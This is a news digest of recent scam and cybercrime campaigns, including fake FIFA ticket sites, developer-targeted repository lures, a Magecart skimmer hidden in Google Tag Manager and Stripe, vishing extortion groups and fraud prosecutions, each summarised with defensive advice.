Scams & Fraud

Researchers say multiple criminal groups have built fake FIFA websites to steal World Cup fans’ passwords, payment details, and money through bogus ticket sales. Group-IB identified four separate campaigns since August 2025, including a Chinese-speaking operation it calls GHOST STADIUM that uses more than 300 active lookalike domains and roughly 3,800 dormant ones. The phishing kit closely copies FIFA’s login flow, can trigger password-reset steps to lock victims out, and is being promoted through Facebook ads offering unrealistically cheap tickets. — Fans trying to buy 2026 World Cup tickets could lose their accounts, have legitimate tickets resold, or pay scammers for fake seats. Users should only type fifa.com directly into their browser, avoid ad-linked ticket offers, and treat lookalike FIFA domains as suspicious.

A likely North Korean-linked group sent more than 250 fake job and code-review emails to developers at nearly 100 organizations, mainly in the United States, to steal login credentials and cryptocurrency wallets. Proofpoint tracks the activity as UNK_DeadDrop and says the attackers used spoofed company brands and attacker-controlled GitHub repositories posing as coding tests or crypto projects; victims were told to clone and open the repos in tools such as Visual Studio Code or Cursor, triggering cross-platform malware on macOS, Linux, and Windows. — Developers and the companies that employ them are the direct targets, and a single successful lure can expose source code, cloud access, and crypto assets. Organizations should warn staff about unsolicited recruiting emails, scrutinize GitHub-based coding tests, and isolate or block unknown repositories and scripts.

Attackers are tricking bank customers into installing fake Android banking app updates from GitHub so they can steal card data and PINs. D3Lab says newer NFCShare variants, seen since May 14, target banks mainly in Italy and Spain after victims visit phishing sites impersonating real banks. The malware abuses near-field communication (NFC) on Android to read card details via IsoDep and EMV commands, then sends the data to command-and-control servers over WebSocket. — This can lead directly to payment-card fraud because victims are persuaded to hand over both card details and their PIN during a fake security check. Android users should only install banking apps from Google Play and treat any request to scan a bank card with their phone or sideload an update from GitHub as suspicious.

The FBI says Silent Ransom Group is targeting U.S. law firms by pretending to be IT support, then stealing data and extorting victims without encrypting files. In 2026 attacks, the group reportedly used callback phishing emails, phone-based social engineering, remote desktop access, and in some cases sent an operative on site to insert a USB or external drive after a failed remote-access attempt; the attackers then used tools such as WinSCP and Rclone to exfiltrate data. — Law firms and other organizations should treat unsolicited IT calls, emails, and in-person support visits as potential attack vectors, not just remote phishing. The warning is urgent because the attackers use legitimate admin tools and leave few traces, so organizations should verify IT identities, restrict external-drive use, and harden remote-access workflows now.

Attackers are tricking people looking for popular PC utilities into installing malware that secretly uses their graphics cards to mine cryptocurrency. Microsoft says the campaign uses search-engine optimization (SEO) poisoning and, in some cases, attacker-controlled links surfaced in AI chatbot responses for tools such as CrystalDiskInfo, HWMonitor, FurMark, K-Lite Codec Pack, PDFgear, and Display Driver Uninstaller. The fake downloads bundle a legitimate program with a malicious dynamic-link library (DLL), install ScreenConnect for remote access, add multiple Windows persistence mechanisms, evade Microsoft Defender, and then deploy GPU miners including gminer, lolMiner, and SRBMiner-MULTI. — This campaign targets owners of powerful Windows systems and can leave victims with both hijacked hardware and a remote-access backdoor for follow-on attacks. Users and defenders should avoid downloading software from AI-generated or unfamiliar links, verify vendor domains, and hunt for the listed indicators of compromise and unauthorized ScreenConnect installs.

A newly identified extortion group called Pink is calling employees while pretending to be IT support, then stealing account credentials and company data to demand payment. Palo Alto Networks Unit 42 says the group, tracked as CL-CRI-1147 and likely linked to the criminal network known as The Com, uses voice phishing and fake help-desk interactions to capture passwords and multifactor authentication (MFA) approvals, then raids services such as SharePoint, OneDrive, and Microsoft Teams. Unit 42 said Pink's leak site went live on May 31 and published domains and IP addresses tied to the campaign as indicators of compromise. — This matters to organizations that rely on cloud productivity tools because attackers do not need malware or software flaws if they can talk staff into handing over access. Companies should warn staff about unsolicited help-desk calls, tighten help-desk identity checks, review Microsoft 365 logs, and block or investigate the listed phishing infrastructure immediately.

Researchers say a new Magecart card-skimming campaign is stealing shoppers’ payment details from compromised online stores and hiding both its malware and stolen data inside trusted Google Tag Manager and Stripe services. Sansec says the skimmer targets Magento and Adobe Commerce checkout pages, pulls JavaScript from a Google Tag Manager container, retrieves payload code from Stripe customer metadata tied to customer ID cus_TfFjAAZQNOYENR, and exfiltrates stolen card, billing, email, and phone data by creating fake Stripe customer records; a variant uses Google Firestore instead of Stripe. The Stripe record was reportedly created on December 24, 2025, suggesting the campaign may have been active for months. — This matters because stores may allow traffic to Google Tag Manager and Stripe by default, letting the skimmer blend in and evade common security controls while stealing card data from real customers. Online retailers using Magento or Adobe Commerce should urgently inspect GTM containers, Stripe API activity, and checkout-page scripts for unauthorized changes.

A Chinese-speaking cybercrime group is using new malware and localized phishing messages to break into organizations in Europe and beyond. Proofpoint says TA4922, linked to activity overlaps with Silver Fox and Void Arachne, has targeted entities in Germany, Italy, the United Kingdom, South Africa, and parts of Southeast Asia since March 2026 using payroll, tax, VAT, invoice, and HR lures sent by email and messaging apps including WhatsApp, LINE, and Microsoft Teams. The campaigns deploy Atlas RAT, RomulusLoader, SilentRunLoader, and Winos4.0/ValleyRAT for remote access, file theft, credential theft, keylogging, screenshots, and webcam or audio capture. — Organizations in the targeted regions should treat this as an active intrusion and phishing threat, especially finance, HR, and compliance teams that may receive convincing local-language messages. Defenders should hunt for the named malware families and remote-management tools, tighten phishing controls, and warn staff to verify unexpected payroll, tax, invoice, or compliance messages across email and chat platforms.

Law enforcement and major tech companies say they disrupted more than 1.4 million accounts and related infrastructure used by scam networks operating from Southeast Asia. The operation, called Disruption Week, involved the US Department of Justice, Royal Thai Police, and firms including Apple, Google, Meta, Microsoft, Coinbase, SpaceX, Silent Push, TRM Labs, and Zenlayer; it led to 63 arrests, the freezing of over $3.8 million in cryptocurrency, and takedowns of social-media accounts, Microsoft accounts, Starlink kits, servers, and malicious network infrastructure linked to fraud compounds in Cambodia, Laos, and Burma. — This matters because the operation targeted industrial-scale scam networks that steal money from victims worldwide and rely on mainstream platforms and connectivity to operate. Users should remain cautious of investment and impersonation scams, while defenders and platforms should watch for follow-on account rebuilds, infrastructure shifts, and related fraud activity.

Police in Europe and the United States say they broke up nine organized crime groups running illegal streaming services and arrested 29 suspects. The seven-month Operation KRATOS 2, led by Bulgaria with Europol support, involved 13 countries and led to the removal of more than 27,000 illegal streaming URLs, identification of 18,000 IP addresses tied to illegal services, 4,370 piracy-linked domains, nearly 400,000 additional URLs flagged for suspension, and 126,000 infringing objects. Investigators say the operators split public-facing sites from backend hosting across jurisdictions to evade takedowns. — People using pirate streaming services are not just risking copyright trouble; Europol says these platforms can also expose users to malware, spyware, and theft of personal data. The story matters because it shows the scale and international reach of the criminal infrastructure behind these services, and affected users should avoid such platforms and check devices for suspicious software if they used them.

Google is adding a new Android feature that warns people when a call may be a scammer pretending to be someone they know. The feature, called fake call detection, is rolling out globally this month on Android 12 and later, starting with Pixel devices, and is enabled by default. It works when both parties use Phone by Google, Contacts, and Google Messages with Rich Communication Services (RCS) enabled, using encrypted device-to-device verification to detect spoofed contact calls and trigger an on-screen warning. — This addresses a real-world fraud tactic that combines fake caller ID with AI-generated voice impersonation, which can trick people into sending money or revealing sensitive information. Android users should keep Google's phone and messaging apps updated and treat urgent calls asking for money, codes, or account access with caution.

A large malware campaign has infected more than 116,000 computers by tricking Minecraft players into downloading booby-trapped mods, cheat clients, and utilities. McAfee says the WeedHack operation has been active since January 2026, spreads via YouTube links and search-result manipulation, and uses thousands of malicious Java archive (JAR) files. The malware steals browser passwords and cookies, Minecraft session IDs, Discord, Steam and Telegram credentials, and crypto-wallet data, while paid tiers add remote-control features such as keylogging, webcam access, shell access, and file management. — This is a broad consumer-focused infostealer campaign hitting gamers at scale, with stolen passwords, session tokens, and wallet data creating immediate account-takeover and financial risk. Minecraft players and parents should avoid unofficial mod download sites, remove suspicious JAR files, run antivirus scans, and reset passwords for any accounts used on affected devices.

The FBI says criminals are using a Telegram-based service called Kali365 to trick people into granting access to their Microsoft 365 accounts. The phishing-as-a-service platform, first seen in April 2026, abuses Microsoft's legitimate device-code login flow so victims authorize attacker-initiated sessions; the stolen OAuth access and refresh tokens can then be reused to access Outlook, Teams and OneDrive without needing the victim's password or another multi-factor authentication prompt. — This matters because victims can lose control of email, files and collaboration accounts even if multi-factor authentication is enabled. Organizations using Microsoft 365 should urgently review device-code login controls and token protections, monitor for suspicious inbox rules and token use, and warn users not to enter login codes from unsolicited emails.

The Police Service of Northern Ireland warned that scammers spoofed its official switchboard number to call people while pretending to be police officers. In the reported case, the caller falsely claimed the target was tied to a money-transfer investigation, asked for bank-card information, and then requested gift cards and their codes; police said the number display was faked and no suspect has yet been arrested. The same police force also disclosed a separate crypto-investment fraud in which an elderly woman lost more than £250,000 after attackers persuaded her to install malware and took control of her devices. — People may trust a call that appears to come from a real police number, so this scam raises the risk of financial theft even for cautious users. Anyone receiving such a call should hang up, independently verify the number, and never provide banking details or gift-card codes to someone claiming to be law enforcement.

Security researchers say more than 5,000 election-themed internet domains were registered in recent weeks ahead of the 2026 U.S. midterms, raising the risk of fake voting sites, donation scams, and impersonation of election officials. Check Point said the registrations increased sharply between April and May and coincided with roughly 17,000 exposed credentials tied to ActBlue, WinRed, GOP, Democrats.org, and USA.gov accounts, creating infrastructure and account access that could support phishing, fraud, or influence operations. — This matters because voters, donors, campaigns, and election workers could be tricked by lookalike sites or targeted through reused or stolen passwords. People should verify election and donation websites carefully, avoid links in unsolicited messages, and reset passwords if they may have been exposed.

Charter Communications says it suffered a security incident after the ShinyHunters extortion group threatened to leak stolen data. The attackers claim they breached Charter on April 1 by using voice phishing (vishing) to compromise an employee's Microsoft Entra account, then used access to Charter's Salesforce environment to export about 40 million customer records, including names, contact details, plan information, support tickets, and some customer proprietary network information (CPNI); Charter disputes that sensitive personal data or CPNI was exfiltrated. — Charter serves tens of millions of customers, so even partial account and service data exposure could create follow-on phishing, fraud, and impersonation risks. Affected users should watch for targeted calls and emails referencing Spectrum or account details, while defenders should review identity-provider protections, help-desk verification, and Salesforce access logs.

A North Carolina man was sentenced to prison for selling elderly Americans' personal information to scammers who used it in lottery fraud schemes. Troy Murray pleaded guilty to conspiracy to commit wire fraud and was sentenced to 121 months after prosecutors said he sold at least 22,000 lead lists between 2016 and 2023 containing names, phone numbers, physical addresses, and email addresses of over 7 million seniors; authorities said the scheme generated more than $5.2 million for him and caused over $9.5 million in victim losses. — This matters because it shows how stolen or traded personal data directly fuels large-scale fraud against older adults. People, especially seniors and their families, should be wary of unsolicited calls or messages about prizes or lotteries, and defenders and policymakers can use the case as a concrete indicator of fraud infrastructure and data-broker abuse.

A newly highlighted Android malware family called BTMOB can give criminals broad control over infected phones, including stealing data and taking over the device. ESET says the remote access trojan (RAT) is spread through phishing pages and fake app stores, abuses Android Accessibility Services to gain elevated privileges, and is sold with an APK-building kit that lets buyers customize lures by country and brand. The campaign has mainly been observed in Latin America. — This is more serious than a typical banking trojan because it can turn an Android phone into a remotely controlled spying and theft tool. Android users should avoid app downloads from links in messages or fake stores, and defenders should watch for phishing infrastructure and abuse of Accessibility permissions.

Italian authorities say they dismantled CINEMAGOAL, a piracy app operation that let customers watch paid streaming services by using stolen or fraudulently obtained access credentials. Investigators say the system used virtual machines in Italy to capture valid authentication and decryption codes from legitimate subscriptions every three minutes, then redistributed them through servers seized in France and Germany. The probe, coordinated with Eurojust, included 100 searches, identified more than 70 resellers, and also disrupted a related IPTV service. — This matters because it was not just copyright infringement but a large-scale unauthorized-access and fraud scheme built around stolen streaming credentials and infrastructure designed to hide users. Streaming providers and affected subscribers should watch for fraudulent account creation and abuse, while defenders should note the use of virtual machines, foreign servers, crypto payments, and fake identities to operate the service.

A Russian-speaking threat actor allegedly used a jailbroken Google Gemini account to run a months-long scam and theft campaign aimed at QAnon and MAGA communities, stealing WordPress admin credentials and draining at least one victim's cryptocurrency wallets. TrendAI says the operation ran from September 2025 to May 2026 through a Telegram channel with about 17,000 subscribers, used 73 likely stolen Gemini API keys, pushed a fake StellarMonster wallet app that actually installed the GoToResolve remote access tool, and captured victims' seed phrases through a bogus wallet-import screen. — This matters because it blends political-community targeting, AI-assisted social engineering, malware, and direct crypto theft in a way ordinary users can fall for and defenders may miss. Users should avoid wallet apps and recovery prompts promoted in Telegram channels, while organizations should investigate exposed WordPress credentials and watch for abuse of stolen API keys.

Two former executives of call-tracking firm C.A. Cloud pleaded guilty to concealing a years-long tech-support scam operation that targeted victims worldwide. Prosecutors say the company knowingly provided phone numbers, call forwarding, recordings, and rotating number pools to fraudsters behind fake malware-warning pop-ups, including scammers impersonating Microsoft and Apple; the pair also allegedly ran a Tunisia call center where employees carried out similar fraud through remote computer access and false invoices. — This matters because it shows the infrastructure behind tech-support scams is being targeted, not just the callers themselves, and the scams often hit older and vulnerable people. Users should be wary of pop-ups or calls claiming their computer is infected, especially if they demand remote access or immediate payment.

Two U.S. men pleaded guilty to helping India-based tech-support scam centers steal millions from Americans, including elderly and disabled victims. Prosecutors said they provided phone numbers, call routing, tracking, and forwarding services for fake malware pop-up scams from 2016 to 2022, continued after learning customers were fraudulent, and advised scammers to rotate large pools of numbers to evade detection; some victims also gave remote access to their devices, leading to financial theft. — This shows how large tech-support scam operations rely on telecom and call-routing support inside the U.S., not just overseas call centers. People should be wary of pop-ups telling them to call for urgent computer help, and providers and defenders can use the case details to spot number rotation and call-forwarding tactics tied to fraud.